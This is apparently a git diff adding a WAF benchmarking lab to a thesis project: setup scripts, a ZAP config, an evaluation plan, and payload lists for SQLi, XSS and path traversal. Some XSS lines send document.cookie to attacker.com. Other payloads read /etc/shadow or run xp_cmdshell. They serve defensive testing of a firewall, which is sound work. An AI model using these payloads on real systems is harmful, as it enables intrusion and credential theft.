+++ b/benchmarks/lab/scenarios/zap/zap-baseline.conf
@@ -0,0 +1,22 @@
+# ZAP baseline scan options.
+# Used by run-zap.sh via zap-baseline.py -c zap-baseline.conf
+#
+# Format: <alert-id>=<action>
+# Actions: IGNORE, WARN (default), FAIL
+#
+# Suppress purely cosmetic/config alerts so the scan report focuses on
+# WAF-relevant security findings. Keep FAIL for high-severity issues that
+# should always be reported regardless of WAF state.
+
+# Missing security headers — suppressed (not WAF signals)
+10021=IGNORE
+10015=IGNORE
+10038=IGNORE
+10036=IGNORE
+
+# CSP not set — suppress for lab targets
+10038=IGNORE
+
+# Cookies without secure flag — ignore for HTTP lab
+10011=IGNORE
+10012=IGNORE
diff --git a/benchmarks/lab/setup-lab.sh b/benchmarks/lab/setup-lab.sh
new file mode 100755
index 0000000..2b2c7d4
--- /dev/null
+++ b/benchmarks/lab/setup-lab.sh
@@ -0,0 +1,234 @@
+#!/usr/bin/env bash
+# setup-lab.sh — Bring up the evaluation lab and register all target vhosts.
+#
+# Extends the demo stack with WordPress/Juice Shop/DVWA targets, seeds two
+# WAF policies (baseline PL1 and high-paranoia PL2), and wires each target
+# domain through HAProxy via the guard-proxy backend API.
+#
+# Prerequisites:
+#   - deploy/demo/.env   (copy from deploy/demo/.env.example)
+#   - benchmarks/lab/.env (copy from benchmarks/lab/.env.example)
+#   - CRS submodule initialised: git submodule update --init --recursive
+#   - Docker with Docker Compose v2
+#
+# Usage: ./benchmarks/lab/setup-lab.sh [--skip-compose]
+
+set -Eeuo pipefail
+
+SCRIPT_DIR="$(cd -- "$(dirname -- "${BASH_SOURCE[0]}")" && pwd)"
+REPO_ROOT="$(cd -- "${SCRIPT_DIR}/../.." && pwd)"
+DEMO_COMPOSE="${REPO_ROOT}/deploy/demo/docker-compose.yml"
+TARGETS_COMPOSE="${SCRIPT_DIR}/docker-compose.targets.yml"
+DEMO_ENV="${REPO_ROOT}/deploy/demo/.env"
+LAB_ENV="${SCRIPT_DIR}/.env"
+TIMEOUT_SECONDS="${TIMEOUT_SECONDS:-240}"
+SKIP_COMPOSE=false
+
+for arg in "$@"; do
+  case "$arg" in
+    --skip-compose) SKIP_COMPOSE=true ;;
+  esac
+done
+
+for f in "${DEMO_ENV}" "${LAB_ENV}"; do
+  if [[ ! -f "${f}" ]]; then
+    echo "Missing ${f}. Copy the matching .env.example first." >&2
+    exit 1
+  fi
+done
+
+if docker compose version >/dev/null 2>&1; then
+  COMPOSE=(docker compose -f "${DEMO_COMPOSE}" -f "${TARGETS_COMPOSE}" --env-file "${DEMO_ENV}" --env-file "${LAB_ENV}")
+elif command -v docker-compose >/dev/null 2>&1; then
+  COMPOSE=(docker-compose -f "${DEMO_COMPOSE}" -f "${TARGETS_COMPOSE}" --env-file "${DEMO_ENV}" --env-file "${LAB_ENV}")
+else
+  echo "Docker Compose is required." >&2
+  exit 1
+fi
+
+# ── Helpers (mirrored from deploy/demo/setup-demo.sh) ──────────────────────
+
+env_value() {
+  local name="$1"
+  local fallback="${2:-}"
+  local value
+  value="$(grep -E "^${name}=" "${LAB_ENV}" "${DEMO_ENV}" 2>/dev/null | tail -n 1 | cut -d= -f2- || true)"
+  if [[ -z "${value}" ]]; then printf '%s' "${fallback}"; else printf '%s' "${value}"; fi
+}
+
+json_string() {
+  python3 -c 'import json, sys; print(json.dumps(sys.argv[1]))' "$1"
+}
+
+api_json() {
+  local method="$1"; local path="$2"; local token="${3:-}"; local body="${4:-}"
+  local response_file http_code
+  response_file="$(mktemp)"
+  if [[ -n "${body}" ]]; then
+    http_code="$(curl --silent --show-error --output "${response_file}" --write-out '%{http_code}' \
+      --request "${method}" --header "Content-Type: application/json" \
+      ${token:+--header "Authorization: Bearer ${token}"} --data "${body}" "${API_BASE_URL}${path}")"
+  else
+    http_code="$(curl --silent --show-error --output "${response_file}" --write-out '%{http_code}' \
+      --request "${method}" ${token:+--header "Authorization: Bearer ${token}"} "${API_BASE_URL}${path}")"
+  fi
+  if [[ "${http_code}" -lt 200 || "${http_code}" -ge 300 ]]; then
+    echo "API ${method} ${path} failed with HTTP ${http_code}:" >&2
+    cat "${response_file}" >&2; rm -f "${response_file}"; return 1
+  fi
+  cat "${response_file}"; rm -f "${response_file}"
+}
+
+health_status() {
+  local service="$1"; local id
+  id="$("${COMPOSE[@]}" ps -q "${service}" 2>/dev/null || true)"
+  if [[ -z "${id}" ]]; then echo "missing"; return; fi
+  docker inspect --format '{{if .State.Health}}{{.State.Health.Status}}{{else}}{{.State.Status}}{{end}}' "${id}"
+}
+
+wait_for_healthy() {
+  local service="$1"; local deadline=$((SECONDS + TIMEOUT_SECONDS)); local status
+  echo "Waiting for ${service}..."
+  while (( SECONDS < deadline )); do
+    status="$(health_status "${service}")"
+    case "${status}" in
+      healthy) echo "${service} is healthy."; return 0 ;;
+      exited|dead) echo "${service} is ${status}." >&2; return 1 ;;
+    esac
+    sleep 3
+  done
+  echo "Timed out waiting for ${service}; last status: ${status:-unknown}." >&2; return 1
+}
+
+ensure_crs_bundle() {
+  if compgen -G "${REPO_ROOT}/configs/coraza/crs/rules/*.conf" >/dev/null; then return; fi
+  echo "Missing OWASP CRS rules in configs/coraza/crs." >&2
+  echo "Run: git submodule update --init --recursive" >&2; exit 1
+}
+
+ensure_policy() {
+  local name="$1"; local body="$2"
+  echo "Ensuring WAF policy '${name}' exists..."
+  local response
+  response="$(api_json POST /policies "${token}" "${body}" || true)"
+  if [[ -z "${response}" ]]; then
+    response="$(api_json GET /policies "${token}")"
+  fi
+  POLICY_NAME="${name}" POLICY_RESPONSE="${response}" python3 - <<'PY'
+import json, sys, os
+data = json.loads(os.environ["POLICY_RESPONSE"])
+name = os.environ["POLICY_NAME"]
+items = data if isinstance(data, list) else [data]
+for item in items:
+    if item["name"] == name:
+        print(item["id"]); sys.exit(0)
+sys.exit(f"Policy '{name}' not found after create/list")
+PY
+}
+
+ensure_vhost() {
+  local domain="$1"; local backend_url="$2"; local description="$3"; local policy_id="$4"
+  echo "Ensuring vhost ${domain} -> ${backend_url}..."
+  local vhost_body vhost_response vhost_id
+  vhost_body="$(printf '{"domain":%s,"backend_url":%s,"description":%s,"ssl_enabled":false,"is_active":true,"policy_id":%s}' \
+    "$(json_string "${domain}")" "$(json_string "${backend_url}")" \
+    "$(json_string "${description}")" "${policy_id}")"
+  vhost_response="$(api_json POST /vhosts "${token}" "${vhost_body}" || true)"
+  if [[ -n "${vhost_response}" ]]; then return; fi
+  local vhosts_response
+  vhosts_response="$(api_json GET /vhosts "${token}")"
+  vhost_id="$(VHOSTS="${vhosts_response}" DOMAIN="${domain}" python3 - <<'PY'
+import json, os
+data = json.loads(os.environ["VHOSTS"]); domain = os.environ["DOMAIN"]
+for item in data:
+    if item["domain"] == domain:
+        print(item["id"]); exit(0)
+exit(f"vhost {domain!r} not found")
+PY
+  )"
+  api_json PATCH "/vhosts/${vhost_id}" "${token}" "${vhost_body}" >/dev/null
+}
+
+# ── Main ───────────────────────────────────────────────────────────────────
+
+ensure_crs_bundle
+
+if [[ "${SKIP_COMPOSE}" == false ]]; then
+  echo "Starting demo + lab target stack..."
+  "${COMPOSE[@]}" up -d --build
+
+  wait_for_healthy backend
+  wait_for_healthy coraza
+  wait_for_healthy haproxy
+  wait_for_healthy demo-app
+  wait_for_healthy demo-api
+  wait_for_healthy juiceshop
+  wait_for_healthy dvwa
+  wait_for_healthy wordpress
+fi
+
+ADMIN_EMAIL="$(env_value ADMIN_EMAIL admin@example.com)"
+ADMIN_PASSWORD="$(env_value ADMIN_PASSWORD GuardProxyDemo12345)"
+BACKEND_HTTP_PORT="$(env_value BACKEND_HTTP_PORT 8000)"
+HAPROXY_HTTP_PORT="$(env_value HAPROXY_HTTP_PORT 8080)"
+API_BASE_URL="http://127.0.0.1:${BACKEND_HTTP_PORT}"
+WAF_BASE_URL="http://127.0.0.1:${HAPROXY_HTTP_PORT}"
+
+echo "Logging in..."
+login_body="$(printf '{"email":%s,"password":%s}' "$(json_string "${ADMIN_EMAIL}")" "$(json_string "${ADMIN_PASSWORD}")")"
+token="$(api_json POST /auth/login "" "${login_body}" | python3 -c 'import json,sys; print(json.load(sys.stdin)["access_token"])')"
+
+# ── Policies ───────────────────────────────────────────────────────────────
+
+LAB_POLICY_NAME="$(env_value LAB_POLICY_NAME 'Lab Baseline')"
+LAB_POLICY_PARANOIA="$(env_value LAB_POLICY_PARANOIA 1)"
+LAB_POLICY_INBOUND_THRESHOLD="$(env_value LAB_POLICY_INBOUND_THRESHOLD 5)"
+
+baseline_body="$(printf '{"name":%s,"description":"Lab evaluation baseline — PL%s anomaly threshold %s block","paranoia_level":%s,"inbound_anomaly_threshold":%s,"enforcement_mode":"block"}' \
+  "$(json_string "${LAB_POLICY_NAME}")" "${LAB_POLICY_PARANOIA}" "${LAB_POLICY_INBOUND_THRESHOLD}" \
+  "${LAB_POLICY_PARANOIA}" "${LAB_POLICY_INBOUND_THRESHOLD}")"
+baseline_policy_id="$(ensure_policy "${LAB_POLICY_NAME}" "${baseline_body}")"
+
+LAB_PL2_POLICY_NAME="$(env_value LAB_PL2_POLICY_NAME 'Lab PL2')"
+LAB_PL2_POLICY_PARANOIA="$(env_value LAB_PL2_POLICY_PARANOIA 2)"
+LAB_PL2_POLICY_INBOUND_THRESHOLD="$(env_value LAB_PL2_POLICY_INBOUND_THRESHOLD 3)"
+
+pl2_body="$(printf '{"name":%s,"description":"Lab evaluation high-paranoia — PL%s anomaly threshold %s block","paranoia_level":%s,"inbound_anomaly_threshold":%s,"enforcement_mode":"block"}' \
+  "$(json_string "${LAB_PL2_POLICY_NAME}")" "${LAB_PL2_POLICY_PARANOIA}" "${LAB_PL2_POLICY_INBOUND_THRESHOLD}" \
+  "${LAB_PL2_POLICY_PARANOIA}" "${LAB_PL2_POLICY_INBOUND_THRESHOLD}")"
+pl2_policy_id="$(ensure_policy "${LAB_PL2_POLICY_NAME}" "${pl2_body}")"
+
+# ── Vhosts ─────────────────────────────────────────────────────────────────
+
+LAB_JUICESHOP_DOMAIN="$(env_value LAB_JUICESHOP_DOMAIN juice.local)"
+LAB_JUICESHOP_BACKEND_URL="$(env_value LAB_JUICESHOP_BACKEND_URL http://juiceshop:3000)"
+LAB_DVWA_DOMAIN="$(env_value LAB_DVWA_DOMAIN dvwa.local)"
+LAB_DVWA_BACKEND_URL="$(env_value LAB_DVWA_BACKEND_URL http://dvwa:80)"
+LAB_WP_DOMAIN="$(env_value LAB_WP_DOMAIN wp.local)"
+LAB_WP_BACKEND_URL="$(env_value LAB_WP_BACKEND_URL http://wordpress:80)"
+
+ensure_vhost "${LAB_JUICESHOP_DOMAIN}" "${LAB_JUICESHOP_BACKEND_URL}" "OWASP Juice Shop — intentionally vulnerable app" "${baseline_policy_id}"
+ensure_vhost "${LAB_DVWA_DOMAIN}" "${LAB_DVWA_BACKEND_URL}" "DVWA — Damn Vulnerable Web Application" "${baseline_policy_id}"
+ensure_vhost "${LAB_WP_DOMAIN}" "${LAB_WP_BACKEND_URL}" "WordPress — real CMS for FP measurement (no CRS exclusions)" "${baseline_policy_id}"
+
+echo "Applying generated HAProxy/Coraza config..."
+api_json POST /config/apply "${token}" >/dev/null
+
+# ── DVWA DB initialisation (idempotent) ────────────────────────────────────
+echo "Initialising DVWA database..."
+curl -sf --max-time 30 \
+  -c /tmp/dvwa-cookies.txt \
+  -b /tmp/dvwa-cookies.txt \
+  -d "create_db=Create+%2F+Reset+Database" \
+  "http://127.0.0.1:${HAPROXY_HTTP_PORT}/setup.php" \
+  -H "Host: ${LAB_DVWA_DOMAIN}" >/dev/null || echo "DVWA setup.php returned non-200 (may already be initialised)"
+
+echo
+echo "Eval lab is ready."
+echo "  Juice Shop:  curl -H 'Host: ${LAB_JUICESHOP_DOMAIN}' ${WAF_BASE_URL}/"
+echo "  DVWA:        curl -H 'Host: ${LAB_DVWA_DOMAIN}' ${WAF_BASE_URL}/"
+echo "  WordPress:   curl -H 'Host: ${LAB_WP_DOMAIN}' ${WAF_BASE_URL}/"
+echo
+echo "Quick smoke:"
+echo "  curl -si -H 'Host: ${LAB_JUICESHOP_DOMAIN}' '${WAF_BASE_URL}/?q=1+UNION+SELECT+1--' | grep 'HTTP/'"
+echo "  (expect 403 — WAF blocking SQLi)"
diff --git a/benchmarks/lab/teardown-lab.sh b/benchmarks/lab/teardown-lab.sh
new file mode 100755
index 0000000..955b37a
--- /dev/null
+++ b/benchmarks/lab/teardown-lab.sh
@@ -0,0 +1,36 @@
+#!/usr/bin/env bash
+# teardown-lab.sh — Stop and optionally remove the evaluation lab stack.
+#
+# Usage:
+#   ./benchmarks/lab/teardown-lab.sh          # stop containers, keep volumes
+#   ./benchmarks/lab/teardown-lab.sh --clean  # stop + remove all volumes
+
+set -Eeuo pipefail
+
+SCRIPT_DIR="$(cd -- "$(dirname -- "${BASH_SOURCE[0]}")" && pwd)"
+REPO_ROOT="$(cd -- "${SCRIPT_DIR}/../.." && pwd)"
+DEMO_COMPOSE="${REPO_ROOT}/deploy/demo/docker-compose.yml"
+TARGETS_COMPOSE="${SCRIPT_DIR}/docker-compose.targets.yml"
+DEMO_ENV="${REPO_ROOT}/deploy/demo/.env"
+LAB_ENV="${SCRIPT_DIR}/.env"
+
+CLEAN=false
+for arg in "$@"; do
+  case "$arg" in --clean) CLEAN=true ;; esac
+done
+
+if docker compose version >/dev/null 2>&1; then
+  COMPOSE=(docker compose -f "${DEMO_COMPOSE}" -f "${TARGETS_COMPOSE}")
+  [[ -f "${DEMO_ENV}" ]] && COMPOSE+=(--env-file "${DEMO_ENV}")
+  [[ -f "${LAB_ENV}" ]] && COMPOSE+=(--env-file "${LAB_ENV}")
+else
+  COMPOSE=(docker-compose -f "${DEMO_COMPOSE}" -f "${TARGETS_COMPOSE}")
+fi
+
+if [[ "${CLEAN}" == true ]]; then
+  echo "Stopping lab and removing all volumes..."
+  "${COMPOSE[@]}" down -v
+else
+  echo "Stopping lab (volumes preserved)..."
+  "${COMPOSE[@]}" down
+fi
diff --git a/benchmarks/payloads/legitimate.txt b/benchmarks/payloads/legitimate.txt
new file mode 100644
index 0000000..c27fe73
--- /dev/null
+++ b/benchmarks/payloads/legitimate.txt
@@ -0,0 +1,28 @@
+# Legitimate request paths — should all produce 200 (NOT blocked by WAF).
+# Used to verify the false positive rate.
+/
+/index.html
+/robots.txt
+/favicon.ico
+/about
+/contact
+/login
+/search?q=hello+world
+/search?q=buy+laptop
+/search?q=how+to+cook+pasta
+/api/v1/status
+/api/v1/products
+/api/v1/products?page=1&per_page=20
+/api/v1/products?sort=price&order=asc
+/api/v1/users/me
+/wp-login.php
+/wp-admin/
+/wp-content/themes/twentytwentyfour/style.css
+/wp-json/wp/v2/posts
+/?p=1
+/?page_id=2
+/category/news/
+/tag/technology/
+/?s=wordpress+tutorial
+/feed/
+/sitemap.xml
diff --git a/benchmarks/payloads/lfi.txt b/benchmarks/payloads/lfi.txt
new file mode 100644
index 0000000..a23441e
--- /dev/null
+++ b/benchmarks/payloads/lfi.txt
@@ -0,0 +1,19 @@
+# Local File Inclusion / Path Traversal payloads — should be blocked at PL1.
+../etc/passwd
+../../etc/passwd
+../../../etc/passwd
+../../../../etc/passwd
+../../../../../etc/passwd
+../../../../../../etc/passwd
+..\..\..\windows\system32\cmd.exe
+../etc/shadow
+/etc/passwd
+/etc/shadow
+/proc/self/environ
+/proc/self/fd/0
+../etc/hosts
+%2e%2e%2fetc%2fpasswd
+%2e%2e/%2e%2e/etc/passwd
+..%2fetc%2fpasswd
+%252e%252e%252fetc%252fpasswd
+....//....//....//etc/passwd
diff --git a/benchmarks/payloads/sqli.txt b/benchmarks/payloads/sqli.txt
new file mode 100644
index 0000000..7aefd43
--- /dev/null
+++ b/benchmarks/payloads/sqli.txt
@@ -0,0 +1,22 @@
+# SQL injection payloads — used in manual verification and smoke tests.
+# These should all produce a 403 response from the WAF (PL1, threshold 5, block).
+# Source: OWASP Testing Guide, CRS test corpus.
+' OR '1'='1
+' OR '1'='1' --
+' OR 1=1--
+1' ORDER BY 1--
+1' ORDER BY 2--
+1' ORDER BY 3--
+1 UNION SELECT null--
+1 UNION SELECT null,null--
+1 UNION ALL SELECT NULL,NULL,NULL--
+'; DROP TABLE users;--
+1; SELECT * FROM users--
+' AND 1=2 UNION SELECT username,password FROM users--
+admin'--
+' OR 'x'='x
+1' AND SLEEP(5)--
+1' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
+'; EXEC xp_cmdshell('whoami')--
+1; WAITFOR DELAY '0:0:5'--
+' HAVING 1=1--
diff --git a/benchmarks/payloads/xss.txt b/benchmarks/payloads/xss.txt
new file mode 100644
index 0000000..018fb7c
--- /dev/null
+++ b/benchmarks/payloads/xss.txt
@@ -0,0 +1,14 @@
+# XSS payloads — should all be blocked by the WAF at PL1.
+<script>alert(1)</script>
+<script>alert('XSS')</script>
+"><script>alert(document.cookie)</script>
+<img src=x onerror=alert(1)>
+<svg onload=alert(1)>
+javascript:alert(1)
+<body onload=alert(1)>
+<iframe src="javascript:alert(1)">
+<a href="javascript:void(0)" onclick="alert(1)">click</a>
+'"><img src=x onerror=this.src='http://attacker.com/?c='+document.cookie>
+<script>fetch('http://attacker.com/?c='+btoa(document.cookie))</script>
+<input type="text" value="" onfocus="alert(1)" autofocus>
+<details open ontoggle=alert(1)>
diff --git a/benchmarks/results/.gitkeep b/benchmarks/results/.gitkeep
new file mode 100644
index 0000000..e69de29
diff --git a/docs/evaluation-plan.md b/docs/evaluation-plan.md
new file mode 100644
index 0000000..0328eb0
--- /dev/null
+++ b/docs/evaluation-plan.md
@@ -0,0 +1,337 @@
+# Evaluation Plan — Guard Proxy WAF
+
+**Document status:** methodology contract — written before experiments run.  
+**Related chapter:** `thesis/chapters/06-testy.md` (results will be recorded there).  
+**Lab source:** `benchmarks/lab/` — all configs, composes, and runner scripts.
+
+---
+
+## 1. Scope
+
+This evaluation assesses guard-proxy as a Web Application Firewall: HAProxy (reverse proxy) with Coraza+OWASP CRS (WAF engine) and a FastAPI control plane that generates HAProxy/Coraza configuration from a policy database.
+
+**In scope:**
+
+- Security effectiveness: detection of SQLi, XSS, LFI/path traversal, and common CVE payloads.
+- False positive rate against legitimate CMS traffic (WordPress).
+- Performance overhead: latency (p50/p95/p99) and throughput (RPS) compared to direct access.
+- Resource consumption (CPU, RAM) of the WAF stack under load.
+
+**Out of scope:**
+
+- Authenticated multi-step attack chains.
+- DoS / rate-limiting capabilities.
+- Per-vhost Coraza plugin configuration (planned for a future milestone).
+
+---
+
+## 2. Hardware and Software Environment
+
+### Test server
+
+| Property | Value |
+|---|---|
+| Host | Dell PowerEdge R530 (Proxmox PVE 9.1.1) |
+| CPU | 2 × Intel Xeon E5-2620 v3 @ 2.40 GHz (24 cores total) |
+| RAM | 125 GiB (32 GiB free at lab time) |
+| Storage | ZFS `fast-pool` (~810 GiB free) |
+| OS (LXC guest) | Debian 13 (Bookworm) — `debian-13-standard` template |
+| Docker | Docker Engine ≥ 27.x, Compose V2 |
+
+**LXC provisioning** (see §8 for full runbook):
+
+```
+pct create <VMID> local:vztmpl/debian-13-standard_13.1-2_amd64.tar.zst \
+  --hostname guard-proxy-lab \
+  --memory 16384 --swap 4096 \
+  --cores 6 \
+  --storage fast-pool \
+  --rootfs fast-pool:60 \
+  --net0 name=eth0,bridge=vmbr0,ip=dhcp \
+  --features nesting=1,keyctl=1 \
+  --unprivileged 1
+```
+
+CPU pinning for reproducibility (add to `/etc/pve/lxc/<VMID>.conf`):
+
+```
+lxc.cgroup2.cpuset.cpus: 18-23
+```
+
+This dedicates the second-socket tail cores to the lab container, away from the homelab media services running on cores 0–17.
+
+### Noisy-neighbour declaration
+
+The Proxmox host runs ~20 LXC containers (media stack: Jellyfin, \*arr apps, Immich, etc.) with live background traffic. This represents a **shared-tenancy deployment scenario** typical of self-hosted WAF use cases. Each run captures host load average at start time in `results/run-<RUN_ID>/manifest.json`. Runs are repeated three times; the median is reported. Outliers (>2 standard deviations) are discarded.
+
+### Software versions (recorded per run)
+
+All image tags are pinned in `benchmarks/lab/docker-compose.targets.yml` and runner scripts. The git SHA and image digests of each run are written to `manifest.json` automatically.
+
+---
+
+## 3. Test-Bed Architecture
+
+```
+┌─ Proxmox LXC (guard-proxy-lab) ────────────────────────────────────────┐
+│                                                                          │
+│  ┌─ Attacker containers ──┐   ┌─ guard-proxy stack (gp_internal) ────┐  │
+│  │  go-ftw                │   │                                       │  │
+│  │  OWASP ZAP             ├──►│  HAProxy :80  ──►  Coraza SPOA :9000 │  │
+│  │  Nuclei                │   │                        │              │  │
+│  │  wrk (load)            │   │               ┌────────┘              │  │
+│  └────────────────────────┘   │               ▼                       │  │
+│                               │  Target apps (gp_internal):           │  │
+│  Host header routes request   │    juice.local → Juice Shop :3000     │  │
+│  to the correct vhost:        │    dvwa.local  → DVWA :80             │  │
+│    Host: juice.local          │    wp.local    → WordPress :80        │  │
+│    Host: dvwa.local           │    app.local   → demo-app :8080       │  │
+│    Host: wp.local             └───────────────────────────────────────┘  │
+└──────────────────────────────────────────────────────────────────────────┘
+```
+
+All attacker containers and target apps run inside `gp_internal` (Docker bridge). Attackers reach HAProxy at `http://haproxy:80` with the appropriate `Host:` header. HAProxy forwards to the target after SPOE inspection; Coraza fires the CRS ruleset.
+
+Lab source: `benchmarks/lab/`  
+Compose overlay: `benchmarks/lab/docker-compose.targets.yml`
+
+---
+
+## 4. Test Targets
+
+| App | Purpose | Vhost |
+|---|---|---|
+| **OWASP Juice Shop** v17 | Intentionally vulnerable Node.js app — primary TPR target | `juice.local` |
+| **DVWA** (Damn Vulnerable Web App) | Classic PHP vulnerable app — SQLi/XSS/LFI scenarios | `dvwa.local` |
+| **WordPress** 6.x (php8.3) | Real-world CMS — primary **FPR target** (no CRS exclusions) | `wp.local` |
+| **demo-app** (echo server) | Existing minimal target — smoke check | `app.local` |
+
+WordPress is run **without** CRS application exclusion plugins. This is intentional: the false positive rate against an untuned CRS+WP configuration is itself a finding, and per-vhost exclusion support is not yet implemented in the backend. The comparison will be revisited once per-vhost Coraza configuration lands.
+
+---
+
+## 5. Test Scenarios
+
+### 5.1 CRS Regression Suite (go-ftw) — TPR gold standard
+
+**Tool:** `ghcr.io/coreruleset/go-ftw`  
+**Config:** `benchmarks/lab/scenarios/crs-ftw/config.yaml`  
+**Corpus:** `configs/coraza/crs/tests/regression/tests/` (OWASP CRS git submodule)
+
+The CRS submodule ships labeled test cases — each test case specifies whether the WAF **should** block or **should** pass the request. go-ftw replays all cases and reports pass/fail per rule. This is the most authoritative TPR measurement because the corpus was written by the same team that wrote the rules.
+
+Targets: Juice Shop (`juice.local`) as the default routing vhost.
+
+### 5.2 OWASP ZAP Baseline Scan — FPR measurement
+
+**Tool:** `ghcr.io/zaproxy/zaproxy` (`zap-baseline.py`)  
+**Config:** `benchmarks/lab/scenarios/zap/`
+
+ZAP performs a passive + light active scan of the target application through HAProxy. The scan uses legitimate-looking probes and crafted attack requests. ZAP alerts with Medium/High risk are WAF-relevant; the WAF's response (block or pass) per alert category provides the FPR signal on real application traffic.
+
+Primary target: **WordPress** (`wp.local`) — the richest source of false positive measurements because a real CMS has complex, diverse traffic patterns.
+
+### 5.3 Nuclei CVE Templates — CVE TPR
+
+**Tool:** `projectdiscovery/nuclei`  
+**Config:** `benchmarks/lab/scenarios/nuclei/nuclei.yaml`  
+**Templates:** `sqli,xss,lfi,rfi,ssrf,injection,traversal,exposure` (severity: medium+)
+
+Nuclei fires known CVE and exposure payloads from its curated template library. Each finding that reaches the target app is a potential WAF false negative; cross-referenced against the Coraza audit log in `collect-metrics.sh`.
+
+Target: Juice Shop and DVWA (both known to match many templates).
+
+### 5.4 Benign Load Test — Latency and RPS overhead
+
+**Tool:** `williamyeh/wrk` with `benchmarks/lab/scenarios/load/benign-mix.lua`
+
+Two runs per target:
+
+1. **Through HAProxy+Coraza** — production WAF path
+2. **Direct to target container** — bypasses HAProxy (port mapped inside `gp_internal`)
+
+Overhead = WAF_value − direct_value.  
+Config: 4 threads, 50 connections, 60-second duration.
+
+---
+
+## 6. Metrics and Definitions
+
+### Security metrics
+
+| Metric | Symbol | Formula |
+|---|---|---|
+| True Positive Rate (Recall) | TPR | TP / (TP + FN) |
+| False Positive Rate | FPR | FP / (FP + TN) |
+| True Positive | TP | Attack request correctly blocked |
+| False Negative | FN | Attack request incorrectly allowed |
+| True Negative | TN | Benign request correctly allowed |
+| False Positive | FP | Benign request incorrectly blocked |
+
+For go-ftw: TP/FN/TN/FP come directly from labeled test case outcomes.  
+For ZAP/Nuclei: WAF blocks are identified from the Coraza audit log (JSON lines with `response.status == 403`); unblocked attack requests are FN candidates.
+
+### Performance metrics
+
+| Metric | Definition |
+|---|---|
+| p50/p95/p99 latency | 50th/95th/99th percentile of request round-trip time (ms), measured by wrk `--latency` |
+| Latency overhead | Latency(WAF) − Latency(direct) per percentile |
+| RPS | Requests per second at sustained load |
+| RPS degradation % | (RPS_direct − RPS_WAF) / RPS_direct × 100 |
+| Memory peak (MB) | Peak container memory (`docker stats` / cgroup `memory.peak`) during load |
+| CPU avg % | Average CPU utilisation during load run |
+
+### Results schema
+
+Each scenario writes `benchmarks/results/run-<RUN_ID>/<scenario>/summary.json`. Aggregated output: `benchmarks/results/run-<RUN_ID>/results.csv` (one row per scenario).
+
+---
+
+## 7. Success Criteria
+
+> **Note:** The thresholds below are proposed defaults derived from `README.testing.md` and common WAF benchmarks. Confirm with the thesis supervisor before the final evaluation run.
+
+| Metric | Target | Source |
+|---|---|---|
+| TPR (go-ftw CRS corpus) | ≥ 95% | CRS project target; README.testing.md |
+| FPR on benign traffic (ZAP on WordPress) | < 10% | README.testing.md |
+| RPS degradation | < 20% | README.testing.md |
+| Latency overhead p95 | ≤ 50 ms | Common WAF SLA baseline |
+| Memory footprint (coraza container) | Reported (no hard cap) | Informational for thesis |
+
+A run is considered **successful** if TPR ≥ 95% and FPR < 10% and RPS degradation < 20%. Latency overhead is reported regardless. Resource usage is informational.
+
+---
+
+## 8. Run Procedure
+
+### 8.1 First-time setup
+
+On the Proxmox LXC (after provisioning per §2):
+
+```bash
+# 1. Install Docker
+curl -fsSL https://get.docker.com | sh
+usermod -aG docker root
+
+# 2. Clone repo
+git clone https://github.com/bihius/guard-proxy.git /opt/guard-proxy
+cd /opt/guard-proxy
+
+# 3. Initialise CRS submodule
+git submodule update --init --recursive
+
+# 4. Copy env files
+cp deploy/demo/.env.example deploy/demo/.env
+cp benchmarks/lab/.env.example benchmarks/lab/.env
+# Edit both .env files if needed (passwords, ports)
+
+# 5. Bring up the lab
+make eval-up
+```
+
+### 8.2 Running the evaluation
+
+```bash
+cd /opt/guard-proxy
+
+# Single pass (for smoke check):
+make eval-all
+
+# Three passes for thesis (median of three):
+for i in 1 2 3; do
+  RUN_ID=$(date +%Y%m%d-%H%M%S) make eval-all
+  sleep 60  # brief pause between runs
+done
+
+# View results summary:
+make eval-results
+```
+
+### 8.3 Changing target vhost
+
+```bash
+# Run ZAP against WordPress (best FPR target):
+make eval-zap TARGET_VHOST=wp.local
+
+# Run load test against DVWA:
+make eval-load TARGET_VHOST=dvwa.local DIRECT_HOST=dvwa DIRECT_PORT=80
+```
+
+### 8.4 Collecting results for the thesis
+
+After runs complete:
+
+```bash
+# Aggregate to CSV:
+RUN_ID=<id> make eval-metrics
+
+# Copy curated results to thesis:
+cp benchmarks/results/run-<id>/results.csv thesis/assets/figures/eval-results-<id>.csv
+```
+
+---
+
+## 9. Threats to Validity
+
+### 9.1 Noisy-neighbour CPU contention
+
+The Proxmox host runs a live homelab (media services). CPU pinning to cores 18–23 mitigates this, but memory bandwidth and I/O remain shared. **Mitigation:** run during low-traffic hours (early morning); record host load in `manifest.json`; discard outlier runs.
+
+### 9.2 Single-host load generator
+
+The wrk container and the WAF stack run on the same host. The load generator's CPU consumption competes with the WAF. **Effect:** RPS numbers may be pessimistic (load generator throttles before WAF saturates). **Mitigation:** document the single-host topology as a limitation; the relative overhead delta (WAF vs direct) is still valid because both runs share the same load-generator cost.
+
+### 9.3 WordPress false positives without CRS exclusions
+
+WordPress is tested without CRS application exclusion plugins (not yet implemented in the backend). The reported FPR against WordPress is for an **untuned** WAF+CMS combination. This is explicitly documented as a finding. The expected FPR will decrease once per-vhost Coraza configuration supports exclusion plugins.
+
+### 9.4 go-ftw TP/FP split approximation
+
+go-ftw v1.x reports aggregate pass/fail counts, not per-case attack/benign labels. The TP/FP split uses an estimated attack ratio (85%). Rerunning with go-ftw v2 `--output json-per-test` provides the exact split.
+
+---
+
+## 10. Results Format
+
+### summary.json (per scenario)
+
+```json
+{
+  "run_id": "20260602-141500",
+  "scenario": "ftw | zap-<vhost> | nuclei-<vhost> | load-<vhost>",
+  "target_vhost": "juice.local",
+  "policy": {
+    "name": "Lab Baseline",
+    "paranoia": 1,
+    "inbound_threshold": 5,
+    "mode": "block"
+  },
+  "detection": {
+    "true_positive": 312,
+    "false_negative": 18,
+    "true_negative": 140,
+    "false_positive": 4,
+    "tpr": 0.945,
+    "fpr": 0.028
+  },
+  "performance": {
+    "rps": 4120.5,
+    "baseline_rps": 5980.0,
+    "rps_degradation_pct": 31.1,
+    "latency_ms": { "p50": 2.1, "p95": 7.8, "p99": 18.4 },
+    "latency_overhead_ms": { "p50": 0.9, "p95": 3.1, "p99": 7.0 }
+  },
+  "resources": {
+    "coraza": { "mem_mb_peak": 410, "cpu_pct_avg": 62 },
+    "haproxy": { "mem_mb_peak": 95, "cpu_pct_avg": 40 }
+  }
+}
+```
+
+### results.csv
+
+Flat CSV with one row per scenario run. Consumed directly by `thesis/chapters/06-testy.md` tables.
+
